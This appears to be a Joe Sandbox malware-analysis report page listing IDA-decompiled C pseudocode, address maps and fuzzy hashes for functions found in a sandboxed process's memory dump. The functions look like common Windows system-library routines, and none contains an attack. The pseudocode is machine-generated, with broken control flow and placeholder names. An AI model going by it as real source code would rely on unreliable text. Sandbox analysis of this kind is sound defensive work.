C-Code - Quality: 80%

			E04CB6074(signed int __ebx, void* __ecx, void* __edi, signed int __esi) {
				void* _t45;
				signed int _t46;
				intOrPtr _t49;
				signed int _t53;
				signed int _t55;
				void* _t57;
				signed int _t61;
				intOrPtr _t63;
				intOrPtr _t70;
				signed int _t74;
				intOrPtr* _t77;
				signed int _t80;
				unsigned int _t86;
				intOrPtr* _t87;
				void* _t89;
				signed int* _t90;
				void* _t91;
				void* _t92;
				signed int _t94;
				signed int _t96;
				void* _t97;

				_t94 = __esi;
				_t92 = __edi;
				_t74 = __ebx;
				if(( *(_t97 - 0x50) & 0x00000001) != 0) {
					_t45 = E04CABE18(_t97 - 0xd4);
					 *(_t97 - 0x50) =  *(_t97 - 0x50) & 0xfffffffe;
				}
				__eflags =  *((char*)(_t97 - 0xf6));
				if( *((char*)(_t97 - 0xf6)) != 0) {
					asm("lock dec dword [edi+0xf8]");
				}
				__eflags =  *((char*)(_t97 - 0xf7));
				if( *((char*)(_t97 - 0xf7)) == 0) {
					L8:
					__eflags =  *((char*)(_t97 - 0xf8));
					if(__eflags != 0) {
						_t79 = _t97 - 0xf0;
						_t45 = E04CEC1D3(_t74, _t97 - 0xf0, _t92, _t94, __eflags);
						__eflags =  *((char*)(_t97 - 0xf9));
						if( *((char*)(_t97 - 0xf9)) != 0) {
							_t74 = 0;
							_t94 = _t92 + 0x2c;
							L04CC2330(_t45, _t94);
							__eflags =  *(_t92 + 0x10c) & 0x00000ffe;
							if(( *(_t92 + 0x10c) & 0x00000ffe) != 0) {
								_t49 =  *0x4da6644; // 0x0
								_t53 = E04CC5D90(_t79,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t49 + 0x000c0000 | 0x00000008, 0xc);
								 *(_t97 - 0x10c) = _t53;
								__eflags = _t53;
								if(_t53 == 0) {
									goto L11;
								} else {
									_push(2);
									_push(0);
									_push(0);
									_push(_t97 - 0x16c);
									_push(0xffffffff);
									_push(0xfffffffe);
									_push(0xffffffff);
									_t55 = E04CF2D70();
									__eflags = _t55;
									if(_t55 >= 0) {
										_t80 =  *(_t97 - 0x10c);
										 *((intOrPtr*)(_t80 + 8)) =  *((intOrPtr*)(_t97 - 0x16c));
										_t57 = _t92 + 0x118;
										_t90 =  *(_t57 + 4);
										__eflags =  *_t90 - _t57;
										if( *_t90 != _t57) {
											_t80 = 3;
											asm("int 0x29");
										}
										 *_t80 = _t57;
										 *(_t80 + 4) = _t90;
										 *_t90 = _t80;
										 *(_t57 + 4) = _t80;
										_t86 = (( *(_t92 + 0x10c) & 0xfffff000) + 0x00001000 ^  *(_t92 + 0x10c)) & 0x007ff000 ^  *(_t92 + 0x10c);
										 *(_t92 + 0x10c) = _t86;
										_t61 = _t86 >> 0x0000000b ^ _t86;
										__eflags = _t61 & 0x00000ffe;
										if((_t61 & 0x00000ffe) == 0) {
											_t74 = 1;
										}
										_t45 = E04CC24D0(_t94);
										__eflags = _t74;
										if(_t74 != 0) {
											_t45 = E04CF1BB0(_t92 + 0x114);
										}
										goto L12;
									} else {
										_t63 =  *0x4da6644; // 0x0
										E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t63 + 0xc0000,  *(_t97 - 0x10c));
										goto L11;
									}
								}
								L18:
								__eflags = _t92 -  *0x4da6888; // 0x0
								if(__eflags == 0) {
									_t89 = 0x4da688c;
									_t77 = 0x4da6888;
									L15:
									_t45 = E04CB2712(_t74, _t77, _t89, _t92, _t94, __eflags);
									L16:
									__eflags = _t94 | 0xffffffff;
									return _t45;
								}
								_t96 = _t94 | 0xffffffff;
								__eflags = _t96;
								_t46 = _t96;
								asm("lock xadd [edi], eax");
								if(__eflags == 0) {
									return E04CAB705(_t74, _t92, _t92, _t96, __eflags);
								}
								return _t46;
								goto L34;
							} else {
								L11:
								_t45 = E04CC24D0(_t94);
							}
						}
					}
					L12:
					__eflags =  *((char*)(_t97 - 0xf2));
					if( *((char*)(_t97 - 0xf2)) == 0) {
						goto L16;
					}
					__eflags = _t92 -  *0x4da6890; // 0x2f107c0
					if(__eflags == 0) {
						_t89 = 0x4da6894;
						_t77 = 0x4da6890;
						goto L15;
					}
					goto L18;
				} else {
					L04CC2330( *((intOrPtr*)(_t97 - 0x120)) + 0x250,  *((intOrPtr*)(_t97 - 0x120)) + 0x250);
					 *((intOrPtr*)(_t97 - 4)) = 0xa;
					_t70 =  *((intOrPtr*)(_t97 - 0xf0));
					 *((intOrPtr*)(_t97 - 0x178)) = _t70;
					_t87 =  *((intOrPtr*)(_t97 - 0xec));
					_t91 = _t97 - 0xf0;
					__eflags =  *((intOrPtr*)(_t70 + 4)) - _t91;
					if( *((intOrPtr*)(_t70 + 4)) != _t91) {
						L21:
						asm("int 0x29");
						return E04CC24D0( *((intOrPtr*)(_t97 - 0x120)) + 0x250);
					} else {
						__eflags =  *_t87 - _t91;
						if( *_t87 != _t91) {
							goto L21;
						} else {
							 *_t87 = _t70;
							 *((intOrPtr*)(_t70 + 4)) = _t87;
							 *((intOrPtr*)(_t97 - 4)) = 1;
							_t45 = E04CB6167();
							goto L8;
						}
					}
				}
				L34:
			}

0x04cb6074
0x04cb6074
0x04cb6074
0x04cb6078
0x04d10a1c
0x04d10a21
0x04d10a21
0x04cb607e
0x04cb6085
0x04cb6087
0x04cb6087
0x04cb608e
0x04cb6095
0x04cb60e9
0x04cb60e9
0x04cb60f0
0x04cb60f2
0x04cb60f8
0x04cb60fd
0x04cb6104
0x04cb6106
0x04cb6108
0x04cb610c
0x04cb6111
0x04cb611b
0x04d10a35
0x04d10a4e
0x04d10a53
0x04d10a59
0x04d10a5b
0x00000000
0x04d10a61
0x04d10a61
0x04d10a63
0x04d10a65
0x04d10a6d
0x04d10a6e
0x04d10a70
0x04d10a72
0x04d10a74
0x04d10a79
0x04d10a7b
0x04d10aa7
0x04d10aad
0x04d10ab0
0x04d10ab6
0x04d10ab9
0x04d10abb
0x04d10abd
0x04d10ac2
0x04d10ac2
0x04d10ac4
0x04d10ac6
0x04d10ac9
0x04d10acb
0x04d10aea
0x04d10aec
0x04d10af7
0x04d10af9
0x04d10afe
0x04d10b00
0x04d10b00
0x04d10b03
0x04d10b08
0x04d10b0a
0x04d10b17
0x04d10b17
0x00000000
0x04d10a7d
0x04d10a7d
0x04d10a97
0x00000000
0x04d10a97
0x04d10a7b
0x04cb614b
0x04cb614b
0x04cb6151
0x04d10b21
0x04d10b26
0x04cb6142
0x04cb6142
0x04cb6147
0x04cb6147
0x00000000
0x04cb6147
0x04cb6157
0x04cb6157
0x04cb615a
0x04cb615c
0x04cb6160
0x00000000
0x04d10b32
0x04cb614a
0x00000000
0x04cb6121
0x04cb6121
0x04cb6122
0x04cb6122
0x04cb611b
0x04cb6104
0x04cb6127
0x04cb6127
0x04cb612e
0x00000000
0x00000000
0x04cb6130
0x04cb6136
0x04cb6138
0x04cb613d
0x00000000
0x04cb613d
0x00000000
0x04cb6097
0x04cb60a3
0x04cb60a8
0x04cb60af
0x04cb60b5
0x04cb60bb
0x04cb60c1
0x04cb60c7
0x04cb60ca
0x04d1076d
0x04d10772
0x04cb6073
0x04cb60d0
0x04cb60d0
0x04cb60d2
0x00000000
0x04cb60d8
0x04cb60d8
0x04cb60da
0x04cb60dd
0x04cb60e4
0x00000000
0x04cb60e4
0x04cb60d2
0x04cb60ca
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ef2e4d0c3b2ce22cd176e70c650e2991c7cf4fd4ee0b60b1b7e8d2836145476
Instruction ID: de3cb91b8327f5cd88e33731a8950fbb6afd1fac51c1e53848de5f2603503124
Opcode Fuzzy Hash: 4ef2e4d0c3b2ce22cd176e70c650e2991c7cf4fd4ee0b60b1b7e8d2836145476
Instruction Fuzzy Hash: 1A51D270A00102DBEB25DB24CC00BE9B7B6EB01318F1882A9D599977D1EB74B981DF82

Uniqueness

Uniqueness Score: -1.00%

Function 04CB0C79 Relevance: .1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E04CB0C79(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x4dab370 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E04CF8F40( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x4da5da8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E04CF45E0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = E04CC5D90(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E04CDABA0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E04CF4B50(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E04CF8870(_t67 + 0xc, 0x4c851e0, 0x10) == 0) {
								 *0x4da41d0 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E04CB0D9F(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E04CB0FB0(0xa0, _t64, 0x4da6880, E04CB1CD0, 0, 0) != 0) {
					_t46 = E04CDABA0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x04cb0c79
0x04cb0c8b
0x04cb0c91
0x04cb0c96
0x04cb0ca3
0x04cb0caa
0x04cb0caf
0x04cb0cb5
0x04cb0cbd
0x04cb0cca
0x04cb0ccc
0x04cb0ceb
0x04cb0cee
0x04cb0cf5
0x04cb0cf6
0x04cb0cf7
0x04cb0cf8
0x04cb0cf9
0x04cb0cff
0x04cb0d06
0x04cb0d0a
0x04cb0d13
0x04cb0d1c
0x04cb0d1d
0x04cb0d1e
0x04cb0d1f
0x04cb0d24
0x04cb0d25
0x04cb0d27
0x04cb0d31
0x00000000
0x00000000
0x04d0f0d3
0x04d0f0e1
0x04d0f0e1
0x04d0f0f4
0x04d0f0fe
0x04d0f103
0x04d0f109
0x04d0f110
0x00000000
0x04d0f116
0x04d0f116
0x00000000
0x04d0f116
0x04d0f110
0x04cb0d39
0x04d0f126
0x04d0f12a
0x04cb0d70
0x04cb0d77
0x04d0f137
0x04d0f149
0x04d0f149
0x04d0f137
0x04cb0d7d
0x04cb0d7f
0x04cb0d8d
0x04cb0d8d
0x04cb0d41
0x04cb0d41
0x04cb0d47
0x04cb0d4d
0x04cb0d93
0x00000000
0x00000000
0x04cb0d59
0x04cb0d6e
0x04cb0d97
0x04cb0d97
0x00000000
0x04cb0d6e
0x04cb0d4f
0x04cb0d4f
0x04cb0d54
0x00000000
0x04cb0d54
0x04cb0d3f
0x00000000
0x04cb0d3f
0x04cb0ce3
0x04d0f0c2
0x00000000
0x04cb0ce9
0x04cb0ce9
0x00000000
0x04cb0ce9

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc8c1a3e266e7205b03fdc330daa370fd472786d097b6f1d7f110817a30b0d87
Instruction ID: 0af9141fc0cd34dffb738fb9f3ed784ba390ac7676a614dee159222e794b6f17
Opcode Fuzzy Hash: dc8c1a3e266e7205b03fdc330daa370fd472786d097b6f1d7f110817a30b0d87
Instruction Fuzzy Hash: B641B271B00714AFEB21DF25CC90FAB77AAAB45744F04409AE985972C1D7B4FE40CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04D781EE Relevance: .1, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04D781EE(signed char __ecx, intOrPtr __edx, void* __eflags, signed int _a4, intOrPtr _a8) {
				signed char _v8;
				void* _v12;
				char _v16;
				intOrPtr _v20;
				signed char _v24;
				signed char _v28;
				signed char _t42;
				char* _t44;
				void* _t55;
				signed char _t59;
				signed char _t61;
				void* _t62;
				signed char _t65;
				signed char _t67;
				signed char _t71;
				intOrPtr _t78;
				signed int _t89;

				_t61 = __ecx;
				_v8 = __ecx;
				_v20 = __edx;
				_t89 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				if(E04D78435(__ecx + 0x18) != 0) {
					_v28 = 0;
					_t65 = 0;
					_v16 = 0;
					if((_t89 & 0x01000000) != 0) {
						L10:
						if(_a8 != 0) {
							_t89 = _t89 | 0x00000008;
						}
						_t42 = E04D78411(_t65 + _v20, _t89);
						_t78 = _v20;
						_t67 = _t42;
						_v24 = _t67;
						if(_t67 < _t78 || _t78 > 0x7fffffff) {
							goto L2;
						} else {
							_t69 = _t61;
							_t62 = E04D78360(_t61, _t78, _t67, _t89 & 0x13000003,  &_v12);
							if(_t62 == 0 || (_t89 & 0x30000f08) == 0) {
								goto L3;
							} else {
								_t55 = E04D784E2(_v8, _t62, _v20, _t69, _v16, _t89, _a8);
								_t71 = _v28;
								if(_t71 == 0) {
									goto L3;
								} else {
									 *(_t55 + 2) =  *(_t55 + 2) ^ ( *(_t55 + 2) ^ _t71) & 0x0000000f;
									if(E04D578DE(_t71, _v8, _t62, 2, _t55 + 8) >= 0) {
										goto L3;
									} else {
										_t90 = _v8;
										E04D786A8(_v8, _t62, _t89, 0, 0);
										_t62 = 0;
									}
								}
							}
						}
					} else {
						_t59 =  *(__ecx + 0x10);
						_v28 = _t59;
						if(_t59 == 0) {
							goto L10;
						} else {
							_t89 = _t89 | 0x00000008;
							if(E04D578DE(_t59, __ecx, 0, 1,  &_v16) < 0) {
								goto L1;
							} else {
								_t65 = _v16;
								goto L10;
							}
						}
					}
				} else {
					L1:
					_v24 = 0;
					L2:
					_v12 = 0;
					_t62 = 0;
					L3:
					_t90 = _v8;
				}
				if(E04CC3C40() == 0) {
					_t44 = 0x7ffe0380;
				} else {
					_t44 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t44 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E04D6EF66(_t90, _t62, _v24, _v12);
				}
				return _t62;
			}

0x04d781f7
0x04d781fd
0x04d7820e
0x04d78211
0x04d78220
0x04d7824d
0x04d78250
0x04d78252
0x04d7825b
0x04d78281
0x04d78285
0x04d78287
0x04d78287
0x04d7828f
0x04d78294
0x04d78297
0x04d78299
0x04d7829e
0x00000000
0x04d782ac
0x04d782b9
0x04d782c0
0x04d782c4
0x00000000
0x04d782d6
0x04d782e7
0x04d782ec
0x04d782f1
0x00000000
0x04d782f7
0x04d782ff
0x04d78313
0x00000000
0x04d78319
0x04d7831c
0x04d78323
0x04d78328
0x04d78328
0x04d78313
0x04d782f1
0x04d782c4
0x04d7825d
0x04d7825d
0x04d78260
0x04d78265
0x00000000
0x04d78267
0x04d78272
0x04d7827c
0x00000000
0x04d7827e
0x04d7827e
0x00000000
0x04d7827e
0x04d7827c
0x04d78265
0x04d78222
0x04d78222
0x04d78222
0x04d78225
0x04d78225
0x04d78228
0x04d7822a
0x04d7822a
0x04d7822a
0x04d78234
0x04d7832f
0x04d7823a
0x04d78243
0x04d78243
0x04d78337
0x04d78352
0x04d78352
0x04d7835d

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
Instruction ID: 0ecc1a6d45a030e362205f4997dee3c43218bc7f63ec52abe1af6865771cf68e
Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
Instruction Fuzzy Hash: D6418371B00115ABDF15EF99C888AAFBBBAEB88714F554069F905E7241E670EE009760

Uniqueness

Uniqueness Score: -1.00%

Function 04CB07A7 Relevance: .1, Instructions: 128
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E04CB07A7(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _t43;
				intOrPtr* _t48;
				intOrPtr _t49;
				char* _t54;
				intOrPtr _t57;
				void* _t67;
				void* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t74;
				signed char _t79;
				intOrPtr* _t80;
				intOrPtr* _t82;
				void* _t86;
				intOrPtr _t89;

				_t43 =  *0x4da664c; // 0x2f1c538
				_push(0);
				_t86 = __edx;
				_t89 = __ecx;
				L04CC2330(_t43 + 4, _t43 + 4);
				_t1 = _t89 + 0x28; // 0x28
				L04CC2330(_t1, _t1);
				_t2 = _t89 + 0x2c; // 0x2c
				_t82 = _t2;
				_t73 =  *((intOrPtr*)(_t82 + 4));
				_t48 = _t86 + 4;
				if( *_t73 != _t82) {
					_t74 = 3;
					asm("int 0x29");
					L24:
					_t49 =  *((intOrPtr*)(_t74 + 0x18));
					L22:
					_t74 =  *_t74;
					L20:
					if(_t74 == _t82) {
						L11:
						 *((intOrPtr*)(_t89 + 0x18)) = _t49;
						_push( &_v12);
						_push(0);
						_t25 = _t89 + 0x10; // 0x10
						_push(_t49);
						_t69 = E04CF4550();
						if(_t69 >= 0) {
							 *((intOrPtr*)(_t89 + 8)) = _v12;
							 *((intOrPtr*)(_t89 + 0xc)) = _v8;
						}
						if(E04CC3C40() != 0) {
							_t54 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x234;
						} else {
							_t54 = 0x7ffe038e;
						}
						if( *_t54 != 0) {
							if(_t69 >= 0) {
								E04D3C5FC(_t86, _t89,  *((intOrPtr*)(_t89 + 0x50)),  *((intOrPtr*)(_t86 + 0x10)),  *(_t86 + 0x24),  *((intOrPtr*)(_t89 + 0x10)),  *((intOrPtr*)(_t89 + 0x14)));
							}
						}
						_t30 = _t89 + 0x28; // 0x28
						E04CC24D0(_t30);
						_t57 =  *0x4da664c; // 0x2f1c538
						E04CC24D0(_t57 + 4);
						return _t69;
					}
					if(_t49 >  *((intOrPtr*)(_t74 + 0x18))) {
						goto L24;
					}
					goto L22;
				}
				 *_t48 = _t82;
				 *((intOrPtr*)(_t48 + 4)) = _t73;
				 *_t73 = _t48;
				 *((intOrPtr*)(_t82 + 4)) = _t48;
				 *((intOrPtr*)(_t86 + 0xc)) = _t89;
				if( *((intOrPtr*)(_t89 + 0x5c)) == 1) {
					if(( *(_t86 + 0x24) & 0xffffffee) != 0) {
						 *((intOrPtr*)(_t86 + 0x64)) = 1;
					}
				}
				_t79 = 0;
				_t9 = _t89 + 0x3c; // 0x3c
				_t71 = _t9;
				goto L3;
				do {
					L6:
					if( *_t80 != 0) {
						asm("bts ebx, eax");
					}
					_t67 = _t67 + 1;
					_t80 = _t80 + 4;
				} while (_t67 < 5);
				 *((intOrPtr*)(_t89 + 0x34)) =  *((intOrPtr*)(_t89 + 0x34)) + 1;
				if(( *(_t86 + 0x20) & 0x00000004) != 0) {
					 *((intOrPtr*)(_t89 + 0x38)) =  *((intOrPtr*)(_t89 + 0x38)) + 1;
				}
				_t49 =  *((intOrPtr*)(_t86 + 0x1c));
				if( *((intOrPtr*)(_t89 + 0x18)) < _t49) {
					_t74 =  *_t82;
					goto L20;
				} else {
					goto L11;
				}
				L3:
				if(( *(_t86 + 0x24) & 1 << _t79) != 0) {
					 *_t71 =  *_t71 + 1;
				}
				_t79 = _t79 + 1;
				_t71 = _t71 + 4;
				if(_t79 < 5) {
					goto L3;
				} else {
					_t13 = _t89 + 0x3c; // 0x3c
					_t80 = _t13;
					_t67 = 0;
					goto L6;
				}
			}

0x04cb07af
0x04cb07ba
0x04cb07be
0x04cb07c0
0x04cb07c2
0x04cb07c7
0x04cb07cb
0x04cb07d0
0x04cb07d0
0x04cb07d3
0x04cb07d6
0x04cb07db
0x04cb08c5
0x04cb08c6
0x04cb08c8
0x04cb08c8
0x04cb08bf
0x04cb08bf
0x04cb08b6
0x04cb08b8
0x04cb0843
0x04cb0847
0x04cb084a
0x04cb084b
0x04cb084c
0x04cb084f
0x04cb0856
0x04cb085a
0x04cb0860
0x04cb0867
0x04cb0867
0x04cb0871
0x04d0ea96
0x04cb0877
0x04cb0877
0x04cb0877
0x04cb087f
0x04d0eaa2
0x04d0eabb
0x04d0eabb
0x04d0eaa2
0x04cb0885
0x04cb0889
0x04cb088e
0x04cb0897
0x04cb08a4
0x04cb08a4
0x04cb08bd
0x00000000
0x00000000
0x00000000
0x04cb08bd
0x04cb07e1
0x04cb07e3
0x04cb07e6
0x04cb07e8
0x04cb07ee
0x04cb07f4
0x04d0ea7f
0x04d0ea85
0x04d0ea85
0x04d0ea7f
0x04cb07fa
0x04cb07fc
0x04cb07fc
0x04cb07fc
0x04cb081d
0x04cb081d
0x04cb0820
0x04cb08ac
0x04cb08ac
0x04cb0826
0x04cb0827
0x04cb082a
0x04cb082f
0x04cb0836
0x04cb0838
0x04cb0838
0x04cb083b
0x04cb0841
0x04cb08b4
0x00000000
0x00000000
0x00000000
0x00000000
0x04cb07ff
0x04cb0807
0x04cb08a5
0x04cb08a5
0x04cb080d
0x04cb080e
0x04cb0814
0x00000000
0x04cb0816
0x04cb0818
0x04cb0818
0x04cb081b
0x00000000
0x04cb081b

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 630aa318fee84eb307906a65807646128550951d26c92a51a789223c84401a8c
Instruction ID: fcb1ecdeaab467456c070abf68a80445b0f7057cad250aa1a6e6eb76a78d3b07
Opcode Fuzzy Hash: 630aa318fee84eb307906a65807646128550951d26c92a51a789223c84401a8c
Instruction Fuzzy Hash: C6417D716007019FD728CF6AC480A63B7EAFB48308B1489ADD4D687A50E736FA55CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 04CDA390 Relevance: .1, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E04CDA390(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t38;
				char _t39;
				intOrPtr _t42;
				signed int* _t43;
				signed int _t44;
				signed int _t48;
				char _t59;
				intOrPtr* _t62;
				intOrPtr _t63;
				signed int _t68;
				intOrPtr _t70;
				signed int _t74;
				signed int _t77;
				void* _t78;

				_push(0x20);
				_push(0x4d8c520);
				_t38 = E04D07BE4(__ebx, __edi, __esi);
				_t59 = 0;
				 *((char*)(_t78 - 0x19)) = 0;
				if( *((intOrPtr*)(_t78 + 8)) == 0) {
					_t39 = 0;
					L7:
					 *[fs:0x0] =  *((intOrPtr*)(_t78 - 0x10));
					return _t39;
				}
				L04CC2330(_t38, 0x4da67e8);
				 *(_t78 - 4) =  *(_t78 - 4) & 0x00000000;
				_t77 =  *0x4da4f44; // 0x1
				if(_t77 == 0) {
					_t59 = 1;
					L28:
					 *((char*)(_t78 - 0x19)) = _t59;
					L6:
					 *(_t78 - 4) = 0xfffffffe;
					E04CDA4D8();
					_t39 = _t59;
					goto L7;
				}
				_t74 = _t77;
				 *(_t78 - 0x24) = _t74;
				_t42 =  *0x4da4f40; // 0x2f21038
				 *((intOrPtr*)(_t78 - 0x20)) = _t42;
				while(_t74 > 0) {
					_t68 = _t74 << 5;
					if( *((intOrPtr*)(_t68 + _t42 - 0x1c)) ==  *((intOrPtr*)(_t78 + 8))) {
						_t13 = _t42 - 0x20; // 0x2f21018
						_t62 = _t13 + _t68;
						 *((intOrPtr*)(_t78 - 0x28)) = _t62;
						_t15 = _t62 + 0x10; // 0x2f21028
						_t43 = _t15;
						 *(_t78 - 0x2c) = _t43;
						_t44 =  *_t43;
						if(_t44 == 0) {
							L21:
							_t63 =  *((intOrPtr*)(_t78 - 0x20));
							L16:
							if(_t74 != _t77) {
								_t28 = _t74 - 1; // 0x0
								E04CAB64E(_t28);
							}
							_t77 = _t77 - 1;
							 *0x4da4f44 = _t77;
							if(_t77 == 0) {
								E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t63);
								_t42 = 0;
								 *((intOrPtr*)(_t78 - 0x20)) = 0;
								 *0x4da4f40 = 0;
								 *0x4da4f48 =  *0x4da4f48 & 0;
								L24:
								_t74 =  *(_t78 - 0x24);
								_t77 =  *0x4da4f44; // 0x1
								L20:
								_t59 = 1;
								 *((char*)(_t78 - 0x19)) = 1;
								goto L5;
							}
							_t48 =  *0x4da4f48; // 0x20
							_t49 = _t48 + 0xffffffe0;
							if(_t77 < _t48 + 0xffffffe0) {
								_t42 = E04CC2710( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t63, _t49 << 5);
								 *((intOrPtr*)(_t78 - 0x20)) = _t42;
								if(_t42 == 0) {
									_t59 = 0;
									goto L28;
								}
								 *0x4da4f40 = _t42;
								 *0x4da4f48 =  *0x4da4f48 - 0x20;
								goto L24;
							}
							_t42 =  *((intOrPtr*)(_t78 - 0x20));
							goto L20;
						}
						_t70 =  *((intOrPtr*)(_t78 + 0xc));
						if(_t70 != 0) {
							if(_t70 !=  *_t62) {
								goto L21;
							}
						}
						if(_t44 == 0xffffffff) {
							goto L21;
						}
						_push(_t44 & 0xfffffffc);
						if( *((intOrPtr*)(_t62 + 0x1c)) == 0xc0000019) {
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							E04CC3BC0();
							_t74 =  *(_t78 - 0x24);
							_t62 =  *((intOrPtr*)(_t78 - 0x28));
						} else {
							_push(0xffffffff);
							E04CF2C50();
						}
						if( *(_t62 + 0x14) != 0) {
							_t20 = _t62 + 0x14; // 0x0
							_push( *_t20);
							E04CF2A80();
							 *(_t62 + 0x14) =  *(_t62 + 0x14) & 0x00000000;
						}
						 *( *(_t78 - 0x2c)) =  *( *(_t78 - 0x2c)) & 0x00000000;
						_t77 =  *0x4da4f44; // 0x1
						_t63 =  *0x4da4f40; // 0x2f21038
						 *((intOrPtr*)(_t78 - 0x20)) = _t63;
						goto L16;
					}
					L5:
					_t74 = _t74 - 1;
					 *(_t78 - 0x24) = _t74;
				}
				goto L6;
			}

0x04cda390
0x04cda392
0x04cda397
0x04cda39c
0x04cda39e
0x04cda3a5
0x04d1dfaa
0x04cda3fa
0x04cda3fd
0x04cda409
0x04cda409
0x04cda3b0
0x04cda3b5
0x04cda3b9
0x04cda3c1
0x04d1dfb1
0x04d1dfb7
0x04d1dfb7
0x04cda3ec
0x04cda3ec
0x04cda3f3
0x04cda3f8
0x00000000
0x04cda3f8
0x04cda3c7
0x04cda3c9
0x04cda3cc
0x04cda3d1
0x04cda3d4
0x04cda3da
0x04cda3e4
0x04cda40c
0x04cda40f
0x04cda411
0x04cda414
0x04cda414
0x04cda417
0x04cda41a
0x04cda41e
0x04cda49d
0x04cda49d
0x04cda471
0x04cda473
0x04cda4a2
0x04cda4a5
0x04cda4a5
0x04cda475
0x04cda478
0x04cda47e
0x04cda4b8
0x04cda4bd
0x04cda4bf
0x04cda4c2
0x04cda4c7
0x04cda4cd
0x04cda4cd
0x04cda4d0
0x04cda493
0x04cda493
